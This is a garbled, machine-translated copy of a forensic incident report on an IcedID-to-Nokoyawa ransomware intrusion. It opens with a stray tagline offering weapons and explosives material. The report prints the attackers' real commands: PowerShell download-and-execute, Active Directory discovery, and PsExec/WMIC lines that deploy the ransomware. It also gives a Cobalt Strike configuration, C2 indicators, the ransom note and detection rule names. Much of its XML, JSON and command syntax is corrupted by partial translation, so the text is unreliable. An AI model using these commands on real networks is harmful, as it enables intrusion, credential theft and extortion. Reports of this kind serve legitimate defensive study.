The reader is offered to study materials where he can learn how to handle weapons, explosives, and find the necessary information
372 
Today’s cybersecurity landscape is based on a myriad of demands and threats, leading to constant innovation in the world of cybercrime. Cybercriminals are constantly looking for new and inventive ways to launch attacks and gain unauthorized access to valuable data and resources. In this context, incidents related to the use of HTML macros and ransomware viruses, in particular Nokoyawa, become particularly important. This article analyzes one of the new and dangerous attack methods, which involves the use of HTML macros and ransomware to infiltrate and spread the threat. We will examine this incident without using specific examples, but will focus on the general characteristics and stages of the attack. HTML macros: Enemy entry point. HTML macros, also known as web page macros, were previously used to implement functionality on websites and in electronic documents.
However, over time, cybercriminals have discovered a way to use these macros as a means to create effective attacks. The incident we are looking at started with the electronic delivery of an HTML file that led to the launch of the attack. Analysis revealed that this delivery occurred via email, making this attack method particularly dangerous. HTML Smuggling: A Deception Tool. An HTML file opened by a user caused a fake Adobe page to be displayed and a ZIP archive to download. One of the main aspects of this stage of the attack is the use of a technique known as HTML smuggling. The basic idea is that the user sees a fake page, while behind the scenes malicious content is downloaded. The ZIP archive contained an encrypted password that was designed to protect against automated analysis of malicious content. This was just the first step in a clever plan by cybercriminals. From ZIP to Nokoyawa: The inside scoop. The ZIP archive contained an ISO file. But here is the main trick – it contained a payload of malicious software, but this file was hidden behind a layer of protection. To reveal this layer, attackers used an LNK file that was disguised as a document. And when the user clicked on that LNK file, a sequence of commands was executed that included copying the malicious content from the ISO file to the host before launching the malware. Nokoyawa Ransomware: The Final Act. After downloading the malicious DLL, a connection was made to the IcedID command and control servers, which is another threat in this incident. The user, meanwhile, saw a legitimate image of the financial document, rather than a display of the attack. Attackers also used various tools and commands to detect and deploy their malware. They maneuvered the network and used various methods to attempt to gain unauthorized access and launch attacks.
In early November 2022, the intrusion began with the delivery of an HTML file. We estimate with high confidence that the delivery was by email, as reported in other public reports. This HTML file used a technique known as HTML smuggling. This is one of the methods that attackers have turned to since Microsoft updated the standard macro control options. Just a month ago, this menace was observed using Excel macros in an extremely similar campaign.
When the user opened the HTML file, a fake Adobe page was displayed and the ZIP file was downloaded. Adobe lure includes a password for the ZIP as a way to protect malicious content from automated analysis. Inside the ZIP was an ISO file. Inside the ISO was a malware payload. The only file visible to the user was the LNK file, which masqueraded as a document.
When the user clicked on the LNK file, a series of commands were executed. This involved copying rundll32 and the malicious DLL from the ISO to the host before running the malware. After downloading the malicious DLL, a connection was established to the IcedID command and control servers. In the meantime, the user received a legitimate image of the financial document.
When the malicious DLL was executed, persistence was also established via a scheduled task on the underlying host. This task was set to run the IcedID malware every hour on the host. The initial discovery commands were run a few seconds after contacting the command and control server.
About three hours after the initial IcedID malware was executed, a cmd process was spawned from IcedID. This new process started sending signals to the Cobalt Strike server. This process was then observed accessing LSASS, presumably to access credentials. A quick check of domain administrators using net was also observed.
Practice then paused for about three hours before the threat actor returned. Using the Cobalt Strike beacon, the attacker searched for specific domain administrators using the net utility. Using one of these accounts, the attacker initiated an RDP session to reach the domain controller. Using this session, the threat actor copied the Cobalt Strike beacon to the domain controller and executed it.
The attacker then continued discovery by executing a batch file on the domain controller that ran the usual battery of Active Directory discovery commands using AdFind. After completion, the results of the discovery commands were archived using 7-Zip. The attacker then ran a second batch file that iterated over the network, performing an nslookup for each host in the environment.
After about five hours, the attacker returned to the domain controller and executed a coded PowerShell command that was SessionGopher. SessionGopher is a tool that finds and decrypts stored session information for remote access tools. The attacker then accessed additional hosts via RDP, including a backup server and a file sharing server. On the backup server, the attacker opened the backup console. While on the shared file, they used notepad to view the file on the host.
The attacker went back to the domain controller and used Netscan to scan the network. After scanning, PsExec and WMIC were used to move files between systems on the network. The copied key files included k.exe and p.bat. These two files were the ransomware binary and the batch script that would be used to execute the ransomware.
Five minutes after the files were transferred to the hosts in the domain, the Nokoyawa ransomware binary was launched on the domain controller. At the same time, PsExec was used to execute a p.bat file that runs the ransomware binary on other hosts in the domain. The time to ransomware (TTR) was just over 12 hours after initial infection.
In this case, we see two different threat actors; distributor and actor holding hands on keyboard. Proofpoint tracks this distributor as TA551. The actor working on the keyboard is tracked by Microsoft as Storm-0390, which is a “pen test” team led by Periwinkle Tempest (previously tracked as Storm-0193 and DEV-0193).
An affiliate ransomware was observed using RDP in an environment with server name WIN-5J00ETD85P5. This server name matches the name used by the threat from the previous Nokoyawa case. Using internet scanning tools we can see that this hostname is currently active at 78.128.113[.]154 hosted on AS209160 Miti2000 at 4vendeta.com in Bulgaria.
This campaign used compromised emails to deliver a malicious HTML file. According to Proofpoint, this campaign was linked to a distribution group they track as TA551. Thanks to Proofpoint for the example below.
After downloading and opening the HTML file, it downloaded a password-protected ZIP file with a random name. The user was provided with a password to extract the file. The following image shows the HTML file opened in the browser.
The ISO file from the zip archive when mounted contained 1 visible LNK file (documents-9771) and 3 hidden files: demurest.cmd, pimpliest_kufic.png and templates544.png.
Once executed, a legitimate image is displayed to trick the user into thinking it’s okay.
The ISO file contained an LNK file with an image icon that prompted the user to click on it. When the user opened the LNK file, the demurest.cmd batch script was executed.
The batch script in demurest.cmd did the following:
Open pimpliest_kufic.png showing the image.
The Windows xcopy utility was used to copy rundll32.exe to %temp%\entails.exe.
Created a string “templates544.png” in the runtime and copied it with a random number in the format: RANDOM_NUM.RANDOM_NUM.
templates544.png was an IcedID DLL and executed via entails.exe.
We can see from memory (MemProcFS) the cmd executes entails.exe which executes the IcedID dll by looking at the command line. We can also see the cmd->entails.exe call chain with the main parent process explorer.exe.
About six hours after the intrusion, 1.dll (Cobalt Strike) was dumped on the beachhead and then copied to the domain controller. After transferring 1.dll to the domain controller, it was executed through rundll32.exe using the following command:
rundll32.exe 1.dll, DllRegisterServer
IcedID registered a scheduled bridgehead stability task that ran every hour.
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Реєстраційна інформація>
<URI>\{E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67}</URI>
</RegistrationInfo>
<Тригери>
<TimeTrigger id="TimeTrigger">
<Повторення>
<Інтервал>PT1H</Інтервал>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2012-01-01T12:00:00</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
<LogonTrigger id="LogonTrigger">
<Enabled>true</Enabled>
<UserId>ВИДАЛЕНО</UserId>
</LogonTrigger>
</Triggers>
<Директори>
<Принципал id="Автор">
<RunLevel>Найвищий доступний</RunLevel>
<UserId>ВИДАЛЕНО</UserId>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Налаштування>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Пріоритет>7</Пріоритет>
</Settings>
<Actions Context="Author">
<Exec>
<Command>rundll32.exe</Command>
<Аргументи>"C:\Users\REDACTED\AppData\Local\REDACTED\Izjeubaw64.dll",#1 --oyxo="EdgeDecrease\license.dat"</Arguments>
</Exec>
</Actions>
</Task>
We can also see similar information in memory when viewing recently created scheduled tasks:
The compromised user had local administrator rights on their computer, which allowed the attacker to use tools that required higher permissions.
By inspecting the contents of a malicious HTML file, we can detect HTML contraband in the code. First, looking at the <script> tags, we arrive at the following:
If we take this block of data, base64 decode its contents, and export it to a file, we can find the archived ISO file hidden in the document:
The PK header indicates that the data is the beginning of a zip file, and the following data indicates that the content is an ISO file.
The initial vulnerability package used the Windows xcopy utility to rename rundll32.exe to entails.exe. This probably avoids detection logic based on command line execution. Entails.exe, which loaded the IcedID DLL, was then seen entering the cmd.exe process on the underlying host.
Below we can see the IcedID loader in memory in the entails.exe process:
The entail.exe process first opened cmd.exe with GrantedAccess 0x1fffff, which corresponds to PROCESS_ALL_ACCESS, and then called CreateRemoteThread, which was recorded by Sysmon Event ID 10 and 8, respectively, as shown below:
We can also see from memory, beacon.dll was entered in cmd.
Malpedia’s win_cobalt_strike_auto YARA rule was triggered while scanning the memory of the cmd.exe process. The following Cobalt Strike beacon configuration was pulled from process memory:
"BeaconType": "windows-beacon_https-reverse_https", "Порт": 443, «Час сну»: 60000, "Maxgetsize": 1048576, "Джиттер": 0, "MaxDns": 0, «PublicKey»: «30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f bb 1c 18 64 6c 37 7e 03 01 6b 16 2b 12 ba 72 bd f7 dc 36 b4 cd 2e 4e 9b ae 12 20 5a 95 c2 61 70 bf 90 81 05 ad 7f a4 bb cc fa 79 86 32 26 1b ed 98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c ae 03 15 bf de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00 db 27 d7 8a d8 fd 13 b6 a7 3b 9f b7 c3 fb 4d 7a 08 8 е 32 3f 07 61 86 56 ec d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00", "c2_server": "5.8.18.242,/pixel.gif", "UserAgent": "Mozilla/4.0 (сумісний; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)", "PostURI": "/submit.php", "Malleable_C2_Instructions2": "", "HttpGetHeader": "Cookie", "HttpPostHeader": "\n\u0026Content-Type: application/octet-streamid", "SpawnTo": "", "Назва каналу": "", "KillDateYear": 0, "KillDateMonth": 0, "KillDateDay": 0, "DNSIdle": "0.0.0.0", "DNSSleep": 0, "SSH_1": "", "SSH_2": "", "SSH_3": "", "SSH_4": "", "SSH_5": "", "GetVerb": "ОТРИМАТИ", "PostVerb": "POST", "HttpPostChunk": 0, "SpawnTox86": "%windir%\\syswow64\\rundll32.exe", "SpawnTox64": "%windir%\\sysnative\\rundll32.exe", "Криптосхема": 0, "Проксі": "", "ProxyUsername": "", "ProxyPassword": "", "ProxyType": "Налаштування IE", "Застарілий": 0, "LicenseId": 305419776, "bStageCleanup": 0, "bCFGCaution": 0, "KillDate": 0, "TextSectionEnd": 0, "ObfuscateSectionsInfo": "", "ProcessInjectStartRWX": "PAGE_EXECUTE_READWRITE", "ProcessInjectUseRWX": "PAGE_EXECUTE_READWRITE", "ProcessInjectMinAlloc": 0, "ProcessInjectTransformx86": "", "ProcessInjectTransformx64": "", "Використовує файли cookie": 1, "ProcessInjectExecute": "", "ProcessInjectAllocationMethod": 0, "ProcessInjectStub": "b5 4a fe 01 ec 6a 75 ed f3 5e 1a 44 f8 bd 39 29", "HostHeader": ""
The IP and port correspond to what we see in memory:
The typed cmd.exe, in turn, is inserted into rundll32.exe.
It appears that Cobalt Strike was used to access the LSASS memory space. Access granted was 0x1010 & 0x1fffff. These values can be used to identify access by credentials.
Pipes were created with the “postex_” prefix of Cobalt Strike by default.
A coded PowerShell command was observed running from the Cobalt Strike beacon on one of the domain controllers.
After decoding, this command showed the execution of the script SessionGopher .
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8897/'); Invoke-SessionGopher
After loading the IcedID DLL through a renamed rundll32, the following discovery commands were observed on the bridgehead host:
cmd.exe /c chcp >&2 ipconfig /все системна інформація робоча станція net config nltest /domain_trusts nltest /domain_trusts /all_trusts net view /все /домен net view /все net група «Адміністратори домену» /domain
As part of the discovery commands, IcedID used WMI to get a list of antivirus products installed on the underlying host with the following command:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Шлях AntiVirusProduct Get * /Format:List
The attacker also ran the following detection commands via cmd.exe (introduced Beacon process):
net group "адміністратори домену" /domain net user [ВИДАЛЕНО АДМІНІСТРАТОРА ДОМЕНУ] /домен net user Адміністратор/домен net user [ВИДАЛЕНО АДМІНІСТРАТОРА ДОМЕНУ] /домен cmd.exe /C каталог *.txt cmd.exe /C каталог *.dll
AdFind was used for discovery on the domain controller using a batch script called adfind.bat. The script executed the following commands:
adfind.exe -f (objectcategory=person) > ad_users.txt adfind.exe -f objectcategory=computer > ad_computers.txt adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt adfind.exe -f "(objectcategory=group)" > ad_group.txt adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt 7.exe a -mx3 ad.7z ad_* del 7.exe adfind* ad_*
After that, the attacker dropped a new ns.bat batch file. This file contained a list of hosts on the network to perform a DNS lookup with nslookup.
C:\Windows\system32\cmd.exe /C ns.bat nslookup [ВИДАЛЕНО ХОСТ X] ... nslookup [ВИДАЛЕНО ХОСТ XX]
Shortly before the ransomware deployment began, the attacker connected to the backup server and opened the backup console on the host. A final discovery was then performed on the domain controller using the SoftPerfect Netscan tool, which was used to perform a final network discovery scan.
The attacker connected to various hosts on the network through an RDP tunnel through the beacon process on the master host.
We can find the hostname of the threat present in some Windows logs, event IDs 4624, 4776, 4778 and 4779.
WIN-5J00ETD85P5
Workstation name seen in event 4624 on bridgehead:
Again in event 4776 from the domain controller:
And again 4778 and then 4779 on the domain controller:
During an RDP session, 1.dll (Cobalt Strike DLL) was transferred from the bridge via Windows File Explorer.
Similarly, the final files used to perform the deployment of the ransomware were transferred in the same way, as can be seen in the process logging the creation of the file as Explorer.EXE.
After k.exe and p.bat, as well as various other batch scripts, were transferred to the compromised domain controller, the attacker attempted to copy k.exe to other computers on the network using a copy command executed on the domain controller.
Maybe this command execution didn’t work properly, or as a backup, the threat actor ran the copy command again, but this time instead of running cmd /K copy on the domain controller, they ran wmic to run the copy command from the remote host.
This process was repeated for p.bat, this repetition indicates that it was a script and not a failed copy process.
First, copy the command issued to the domain controller:
Second, copy the command using WMIC so that the remote hosts will run the command.
After k.exe and p.bat were copied to computers on the network, the attacker used PsExec.exe to remotely create a service called mstdc to run p.bat (p.bat runs k.exe, which encrypts the system on based on the configuration in Base64 encoding) through the system account.
A “.key” file is created on each host that hosts PsExec. The filename contains the host name of the machine that initiated PsExec.
After AdFind was finished, the results were archived using 7-Zip.
IcedID An outbound connection to trentonkaizerfak[.]com was established after entails.exe (rundll32.exe) successfully executed templates544.png on the underlying host.
This downloaded the gzip file for the next stage of IcedID. After executing this payload, command and control was established for 5.255.103[.]16
Once injected into cmd.exe, a 1.dll (Cobalt Strike DLL) was created on the underlying host, which was later pushed to the domain controller. 1.dll was then executed on the domain controller via rundll32.exe, and after running rundll32.exe connected to the command and control server 5.8.18[.]242.
An attacker was observed deploying the Nokoyawa ransomware throughout the environment using both PSExec and WMIC.
psexec.exe \\[ЦІЛЬОВА IP-адреса] -u [ДОМЕН]\[КОРИСТУВАЧ] -p "[ПАРОЛЬ]" -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat
wmic /node:"[TARGET IP]" /user:"[DOMAIN]\[USER]" /password:"[PASSWORD]" виклик процесу create "cmd.exe /cc:\windows\temp\p.bat"
This duplication of execution with both PsExec and WMIC displays the duplicate commands used to copy files over the network, pointing to scripted execution for backup.
A batch file (p.bat) is responsible for executing the ransomware binary (k.exe) along with its configurations.
c:\windows\temp\k.exe --config ВИДАЛЕНО
After reviewing the configuration provided in the command options, this ransomware is configured to encrypt the network, load hidden drives, and remove shadow copies of volumes.
Additionally, the configuration informs the ransomware binary to skip the following directories and file extensions.
Виключені каталоги - Вікна - Програмні файли - Програмні файли (x86) - Дані програми - ProgramData - Інформація про системний том Виключені розширення файлів - .exe - .dll - .ini - .lnk - .url - ""
Redemption notice.
Нокоява.
Якщо ви бачите це, ваші файли були успішно зашифровані.
Радимо не шукати безкоштовний метод дешифрування.
Це неможливо. Ми використовуємо симетричне та асиметричне шифрування.
УВАГА:
- Не перейменовуйте зашифровані файли.
- Не змінюйте зашифровані файли.
- Не використовуйте стороннє програмне забезпечення.
Для досягнення згоди пропонуємо вам відвідати наш сайт Onion.
Як відкрити посилання Onion:
- Завантажте браузер TOR з офіційного сайту.
- Відкрийте та введіть це посилання:
http://[ВИДАЛЕНО]
- На сторінці ви побачите чат зі службою підтримки.
- Надішліть своє перше повідомлення.
Чим швидше ви зв’яжетеся з нами, тим швидше ви отримаєте рішення.
Кобальтовий удар: 5.8.18.242:443 IcedID: trentonkaizerfak[.]com на 159.89.12.125:80 questdisar[.]com за адресою 5.255.103.16:443 pikchayola[.]фотографії на 5.255.103.16:443
1.dll 9740f2b8aeacc180d32fc79c46333178 c599c32d6674c01d65bff6c7710e94b6d1f36869 d3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e 8c11812d-65fd-48ee-b650-296122a21067.zip 4f4231ca9e12aafac48a121121c6f940 7bd217554749f0f3c31957a37fc70d0a86e71fc3 be604dc018712b1b1a0802f4ec5a35b29aab839f86343fc4b6f2cb784d58f901 adfind.bat ebf6f4683d8392add3ef32de1edf29c4 444c704afe4ee33d335bbdfae79b58aba077d10d 2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04 demurest.cmd 586fe6d361ef5208fad28c5ff8a4579b bf4177381235393279e7cdfd45a3fa497b7b8a96 364d346da8e398a89d3542600cbc72984b857df3d20a6dc37879f14e5e173522 документи-9771.lnk 51e416c3d3be568864994449cd39caa1 ee1c5e9f1257fbda3b174d534d06dddf435d3327 57842fe8723ed6ebdf7fc17fc341909ad05a7a4feec8bdb5e062882da29fa1a8 k.exe 40c9dc2897b6b348da88b23deb0d3952 0f5457b123e60636623f585cc2bf2729f13a95d6 7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6 netscan.exe 16ef238bc49b230b9f17c5eadb7ca100 a5c1e4203c740093c5184faf023911d8f12df96c ce6fc6cca035914a28bbc453ee3e8ef2b16a79afc01d8cb079c70c7aee0e693f p.bat 385d21c0438f5b21920aa9eb894740d2 5d2c17799dfc6717f89cd5f63951829aed038041 e351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f psexec.exe c590a84b8c72cf18f35ae166f815c9df b97761358338e640a31eef5e5c5773b633890914 57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4 pimpliest_kufic.png 49524219dbd2418e3afb4e49e5f1805e b8cb71c48a7d76949c93418ddd0bcae587bef6cc c6294ebb7d2540ee7064c60d361afb54f637370287983c7e5e1e46115613169a redated-invoice-10.31.22.html c8bdc984a651fa2e4f1df7df1118178b f62b155ab929b7808de693620d2e9f07a9293926 31cd7f14a9b945164e0f216c2d540ac87279b6c8befaba1f0813fbad5252248b templates544.png 14f37c8690dda318f9e9f63196169510 306e4ede6c7ea75ef5841f052f9c40e3a761c177 e71772b0518fa9bc6dddd370de2d6b0869671264591d377cdad703fa5a75c338
ET HUNTING Підозрілий порожній сертифікат SSL - спостерігається в Cobalt Strike ET INFO RDP - відповідь на зовнішній хост ET MALWARE Meterpreter або інший сертифікат зворотної оболонки SSL ET MALWARE Win32/IcedID Request Cookie ET ПОЛІТИКА OpenSSL Demo CA - Internet Widgits Pty (O) Створено службу ET POLICY PsExec ET ПОЛІТИКА SMB Передача виконуваних файлів ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу .bat ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу DLL - можливий бічний рух ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу в каталозі Temp ET RPC DCERPC SVCCTL – доступ диспетчера віддаленого керування службами ET SCAN Поведінка Незвичайний трафік Порт 135 Потенційне сканування або зараження ET SCAN Поведінка Незвичайний трафік Порт 445 Потенційне сканування або зараження ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вхідний) ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вихідний)
DFIR Report Repo:
CHCP CodePage Locale Lookup dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f AdFind Discovery 50046619-1037-49d7-91aa-54fc92923604
Поганий Opsec за замовчуванням жертвуючі процеси з неправильними аргументами a7c3d773-caef-227e-a7e7-c2f13c622329 Змініть політики PowerShell на незахищений рівень 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 CMD Shell Output Redirect 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a Схема впорскування CobaltStrike BOF 09706624-b7f6-455d-9d02-adee024cee1d Перший раз побачений віддалений канал з назвою 52d8b0c6-53d6-439a-9e41-52ad442ad9ad Файл ISO, створений у тимчасових папках 2f9356ae-bf43-41b8-b858-4496d83b2acb ISO Image Mount 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073 Новий процес, створений через Wmic.EXE 526be59f-a573-4eea-b5f7-f0973207634d Net.exe Виконання 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac Неінтерактивний процес PowerShell породив f4bbd493-b796-416e-bbf2-121235348529 Потенційне ухилення від оборони через перейменування дуже релевантних двійкових файлів 0ba1da6d-b6ce-4366-828c-18826c9de23e Потенційне виконання інструментів Sysinternals 7cccd811-7ae9-4ebe-9afd-cb5c406b824b Потенційна розвідувальна діяльність через Nltest.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248 Створення процесу за допомогою папки Sysnative 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab Виконання Psexec 730fc21b-eaff-474b-ad23-90fd265d4988 Виконання Rundll32 без файлу DLL c3a99af4-35a9-4668-879e-c09aeb4f2bdf Спільний доступ і перерахування сеансів за допомогою Net.EXE 62510e69-616b-4078-b371-847da438cc03 SMB Create Remote File Admin Share b210394c-ba12-4f89-9117-44a2464b9511 Підозрілий виклик за порядковим номером e79a9e79-eb72-4e78-a628-0e7e8f59e89c Підозріле копіювання з або до System32 fff9d2b7-e11c-4a69-93d3-40ef66189767 Підозріло закодований командний рядок PowerShell ca2092a1-c273-4878-9b4b-0d60115bf5ea Підозріле виконання імені хосту 7be5fb68-f9ef-476d-8b51-0256ebece19e Розвідка підозрілої групи та облікового запису за допомогою Net.EXE d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 Підозріла маніпуляція обліковими записами за замовчуванням через Net.EXE 5b768e71-86f2-4879-b448-81061cbae951 Підозріла мережева команда a29c1813-ab1f-4dde-b489-330b952e91ae Підозрілий процес, створений через Wmic.EXE 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 Підозрілий Rundll32 без будь-яких параметрів командного рядка 1775e15e-b61b-4d14-a1a3-80981298085a Виконання дистанційної команди WMIC 7773b877-5abb-4a3e-b9c9-fd0369b59b00 WmiPrvSE створив процес d21374ff-f574-44a7-9998-4a8c8bf33d7d Труба під назвою CobaltStrike d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 Підозріле виконання Systeminfo 0ef56343-059e-4cb6-adc1-4c3c967c5e46
372 
580 
959